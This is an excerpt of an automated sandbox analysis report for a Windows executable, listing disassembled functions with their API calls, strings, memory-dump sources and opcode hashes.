                                                                                                                    • Opcode ID: 25e8eafb8534b5b6ea7d22cd4615a93f99cf475eadc72982e904265e9915c92c
                                                                                                                    • Instruction ID: 0708a29e6cf8693edbe4cc28193f500a589733eb6effd76c6046bb4c8bcb722e
                                                                                                                    • Opcode Fuzzy Hash: 25e8eafb8534b5b6ea7d22cd4615a93f99cf475eadc72982e904265e9915c92c
                                                                                                                    • Instruction Fuzzy Hash: 0601C436900516A7EF2177B4AD4DA7F7EBAFBC0B52F190110F940AB291DF218D0952B2
                                                                                                                    Function 0059D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00581316: GetDlgItem.USER32(00000000,00003021), ref: 0058135A
                                                                                                                      • Part of subcall function 00581316: SetWindowTextW.USER32(00000000,005B35F4), ref: 00581370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0059D64B
                                                                                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0059D661
                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0059D675
                                                                                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 0059D684
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                    • String ID: RENAMEDLG
                                                                                                                    • API String ID: 445417207-3299779563
                                                                                                                    • Opcode ID: fed0d43c2f996dc02f037dfbf687dcd9d49ea32ad7eed07b2b351504bef1d798
                                                                                                                    • Instruction ID: 5b8e06b4ee4c249ea2a5d75b43a1371f0395c3cdd6f76f754743eb38d7197dbb
                                                                                                                    • Opcode Fuzzy Hash: fed0d43c2f996dc02f037dfbf687dcd9d49ea32ad7eed07b2b351504bef1d798
                                                                                                                    • Instruction Fuzzy Hash: 64014533245200BAD6205F64DD0DF667F6DBBAAB02F000412F242A60A0C6A2AA08A735
                                                                                                                    Function 005A7E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,005A7E24,00000000,?,005A7DC4,00000000,005BC300,0000000C,005A7F1B,00000000,00000002), ref: 005A7E93
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005A7EA6
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,005A7E24,00000000,?,005A7DC4,00000000,005BC300,0000000C,005A7F1B,00000000,00000002), ref: 005A7EC9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                    • Opcode ID: caa13826b2761f1f2841f3d92427d10fadea7500dfc020c7d8c61d5d6ed9ee8c
                                                                                                                    • Instruction ID: 8cc60f20830df3c6e3b91f08bdb31213d091df47ef1b90211f026ae8929f1d48
                                                                                                                    • Opcode Fuzzy Hash: caa13826b2761f1f2841f3d92427d10fadea7500dfc020c7d8c61d5d6ed9ee8c
                                                                                                                    • Instruction Fuzzy Hash: 8AF0443590020CBBCB159FA4DC09B9EBFB9FF44715F0041A9F805A2160DB34AE44DA90
                                                                                                                    Function 0058F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0059081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00590836
                                                                                                                      • Part of subcall function 0059081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0058F2D8,Crypt32.dll,00000000,0058F35C,?,?,0058F33E,?,?,?), ref: 00590858
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0058F2E4
                                                                                                                    • GetProcAddress.KERNEL32(005C81C8,CryptUnprotectMemory), ref: 0058F2F4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                    • API String ID: 2141747552-1753850145
                                                                                                                    • Opcode ID: 3551d842c8a3a1e5094a6b1be3e140ee2bc4c18a95100bd64987564b36731bab
                                                                                                                    • Instruction ID: 74beda97ac6522907daf16ddcc3bf7c05b78e3e9cc3f2ca752f20c4608435c3e
                                                                                                                    • Opcode Fuzzy Hash: 3551d842c8a3a1e5094a6b1be3e140ee2bc4c18a95100bd64987564b36731bab
                                                                                                                    • Instruction Fuzzy Hash: 67E08670950706AECB71AF389C4DB41BED8BF18700F24891DF4DAB3640EAB4F5408B50
                                                                                                                    Function 005A2BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustPointer$_abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2252061734-0
                                                                                                                    • Opcode ID: d9e88f4424f8b73c4f32727426ab87185e0dd1005c1a6e94079b14c3db74cf1d
                                                                                                                    • Instruction ID: c32c2ee7893bc05cbf0baec6a95715c9f88a82345168048171fcc4b0f79af62f
                                                                                                                    • Opcode Fuzzy Hash: d9e88f4424f8b73c4f32727426ab87185e0dd1005c1a6e94079b14c3db74cf1d
                                                                                                                    • Instruction Fuzzy Hash: 6451C371604212AFDB298F18D85ABBEBFA4FF96710F24452DEC02476A2E731ED41D790
                                                                                                                    Function 005ABF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 005ABF39
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005ABF5C
                                                                                                                      • Part of subcall function 005A8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,005ACA2C,00000000,?,005A6CBE,?,00000008,?,005A91E0,?,?,?), ref: 005A8E38
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 005ABF82
                                                                                                                    • _free.LIBCMT ref: 005ABF95
                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005ABFA4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 336800556-0
                                                                                                                    • Opcode ID: f604e565076c7a2de85af679ed8738cc5bee6b81f7c2a6cb8b9a8b395d13a09c
                                                                                                                    • Instruction ID: 4848f92ef6fc64059e496950d9944261f96073b4bd765d29d7529338988597db
                                                                                                                    • Opcode Fuzzy Hash: f604e565076c7a2de85af679ed8738cc5bee6b81f7c2a6cb8b9a8b395d13a09c
                                                                                                                    • Instruction Fuzzy Hash: 24015EA26056157F3321167A5C4DC7F6F6DFAC3BA13280229F904D2142EB609D0195F0
                                                                                                                    Function 005A9869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,?,?,005A91AD,005AB188,?,005A9813,00000001,00000364,?,005A3F73,00000050,?,005C1030,00000200), ref: 005A986E
                                                                                                                    • _free.LIBCMT ref: 005A98A3
                                                                                                                    • _free.LIBCMT ref: 005A98CA
                                                                                                                    • SetLastError.KERNEL32(00000000,?,005C1030,00000200), ref: 005A98D7
                                                                                                                    • SetLastError.KERNEL32(00000000,?,005C1030,00000200), ref: 005A98E0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3170660625-0
                                                                                                                    • Opcode ID: e37851f97885c6a6a37760435d64db4e20fcf02a49781b0341be265b4bfb9797
                                                                                                                    • Instruction ID: 6089786291ed66f2b082b3b1e88370d755bae723d678d7bab288ccac19509e95
                                                                                                                    • Opcode Fuzzy Hash: e37851f97885c6a6a37760435d64db4e20fcf02a49781b0341be265b4bfb9797
                                                                                                                    • Instruction Fuzzy Hash: 2801F4361446276BC31233346C8D96F2D2DFFE3770B250234F505A2192FF388C06A161
                                                                                                                    Function 00590EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 005911CF: ResetEvent.KERNEL32(?), ref: 005911E1
                                                                                                                      • Part of subcall function 005911CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 005911F5
                                                                                                                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00590F21
                                                                                                                    • CloseHandle.KERNEL32(?,?), ref: 00590F3B
                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00590F54
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00590F60
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00590F6C
                                                                                                                      • Part of subcall function 00590FE4: WaitForSingleObject.KERNEL32(?,000000FF,00591206,?), ref: 00590FEA
                                                                                                                      • Part of subcall function 00590FE4: GetLastError.KERNEL32(?), ref: 00590FF6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1868215902-0
                                                                                                                    • Opcode ID: 4e90c1bd09d894c16ebb0adec088f8af098c8de7cf7c08d0fb99db7439c45541
                                                                                                                    • Instruction ID: f1120a61d4d0e17626199a5af786d07015c7e5ee3976864c47a619e6d61f12a5
                                                                                                                    • Opcode Fuzzy Hash: 4e90c1bd09d894c16ebb0adec088f8af098c8de7cf7c08d0fb99db7439c45541
                                                                                                                    • Instruction Fuzzy Hash: A6017571504B44EFCB62AF64DC89BC6FBA9FF08710F100929F16B621A0CB757A48DB54
                                                                                                                    Function 005AC7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 005AC817
                                                                                                                      • Part of subcall function 005A8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,005AC896,?,00000000,?,00000000,?,005AC8BD,?,00000007,?,?,005ACCBA,?), ref: 005A8DE2
                                                                                                                      • Part of subcall function 005A8DCC: GetLastError.KERNEL32(?,?,005AC896,?,00000000,?,00000000,?,005AC8BD,?,00000007,?,?,005ACCBA,?,?), ref: 005A8DF4
                                                                                                                    • _free.LIBCMT ref: 005AC829
                                                                                                                    • _free.LIBCMT ref: 005AC83B
                                                                                                                    • _free.LIBCMT ref: 005AC84D
                                                                                                                    • _free.LIBCMT ref: 005AC85F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: d00cbcf0821b499161efb291ea6e9d0cd17aa1f227dca0603e8150616cde8953
                                                                                                                    • Instruction ID: 824f7d42082d3673383b35c74bb3afcbefd29064402a84fe4540a682fe01be10
                                                                                                                    • Opcode Fuzzy Hash: d00cbcf0821b499161efb291ea6e9d0cd17aa1f227dca0603e8150616cde8953
                                                                                                                    • Instruction Fuzzy Hash: 1FF01D72504202AB8760EB78E98BC6E7FEDBB52714B685819F109D7552CB74FC80CA64
                                                                                                                    Function 00591FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00591FE5
                                                                                                                    • _wcslen.LIBCMT ref: 00591FF6
                                                                                                                    • _wcslen.LIBCMT ref: 00592006
                                                                                                                    • _wcslen.LIBCMT ref: 00592014
                                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0058B371,?,?,00000000,?,?,?), ref: 0059202F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$CompareString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3397213944-0
                                                                                                                    • Opcode ID: 3baa66c09d347e702cb9f522cadccff2c885f4937c2c5c1944ea986dad0de098
                                                                                                                    • Instruction ID: 5348ef7890a5e59c457de5d91caeca47897b475991652e32715eb9a2d6844666
                                                                                                                    • Opcode Fuzzy Hash: 3baa66c09d347e702cb9f522cadccff2c885f4937c2c5c1944ea986dad0de098
                                                                                                                    • Instruction Fuzzy Hash: 1CF01D32048015BBCF226F51EC0DD8E7F6AFB95760F118415F61A6F062CB729665D690
                                                                                                                    Function 005915FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _swprintf
                                                                                                                    • String ID: %ls$%s: %s
                                                                                                                    • API String ID: 589789837-2259941744
                                                                                                                    • Opcode ID: 916b3efbdb750f34f3b669ec5189a26b287e78943f3a3e3fc963dbf4100ad327
                                                                                                                    • Instruction ID: 96ab1e24bd20215fc5c646dc68cb02dff1ebfb0e2b52ebcbf39c364ada9c3011
                                                                                                                    • Opcode Fuzzy Hash: 916b3efbdb750f34f3b669ec5189a26b287e78943f3a3e3fc963dbf4100ad327
                                                                                                                    • Instruction Fuzzy Hash: 2951B435688B23F6FE212B90CE4BF257E69BB05B04F284D06F786644E1D5A2A4107B1E
                                                                                                                    Function 005A7F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\1znAXdPcM5.exe,00000104), ref: 005A7FAE
                                                                                                                    • _free.LIBCMT ref: 005A8079
                                                                                                                    • _free.LIBCMT ref: 005A8083
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                    • String ID: C:\Users\user\Desktop\1znAXdPcM5.exe
                                                                                                                    • API String ID: 2506810119-933696318
                                                                                                                    • Opcode ID: 0760612ca6d3c4feb8e03f69e332188eef5af67b58c662a21dcb93722a700fa7
                                                                                                                    • Instruction ID: 7cc0219d6c551cb6ebf0c68d45c17e36008fe59a55b70fe5fc4d98cd623a13fe
                                                                                                                    • Opcode Fuzzy Hash: 0760612ca6d3c4feb8e03f69e332188eef5af67b58c662a21dcb93722a700fa7
                                                                                                                    • Instruction Fuzzy Hash: F831BFB1A00259AFDB25DF99DC899AEBFFCFF96310F104166F4049B211DA708E48CB61
                                                                                                                    Function 005A31D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 005A31FB
                                                                                                                    • _abort.LIBCMT ref: 005A3306
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EncodePointer_abort
                                                                                                                    • String ID: MOC$RCC
                                                                                                                    • API String ID: 948111806-2084237596
                                                                                                                    • Opcode ID: 2a6f49172b4df83a8e43fe5d83eb6cd6723bdbe6817155c28d90579d25cccf31
                                                                                                                    • Instruction ID: becc471eb38831278b42923c7cedf0bcb24d40fea14e8c998d7d6736f8ed739a
                                                                                                                    • Opcode Fuzzy Hash: 2a6f49172b4df83a8e43fe5d83eb6cd6723bdbe6817155c28d90579d25cccf31
                                                                                                                    • Instruction Fuzzy Hash: E0414A75900209AFCF15DF98CD81AEEBFB5BF4A308F148199FA04A7251D335EA50DB50
                                                                                                                    Function 00587401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00587406
                                                                                                                      • Part of subcall function 00583BBA: __EH_prolog.LIBCMT ref: 00583BBF
                                                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 005874CD
                                                                                                                      • Part of subcall function 00587A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00587AAB
                                                                                                                      • Part of subcall function 00587A9C: GetLastError.KERNEL32 ref: 00587AF1
                                                                                                                      • Part of subcall function 00587A9C: CloseHandle.KERNEL32(?), ref: 00587B00
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
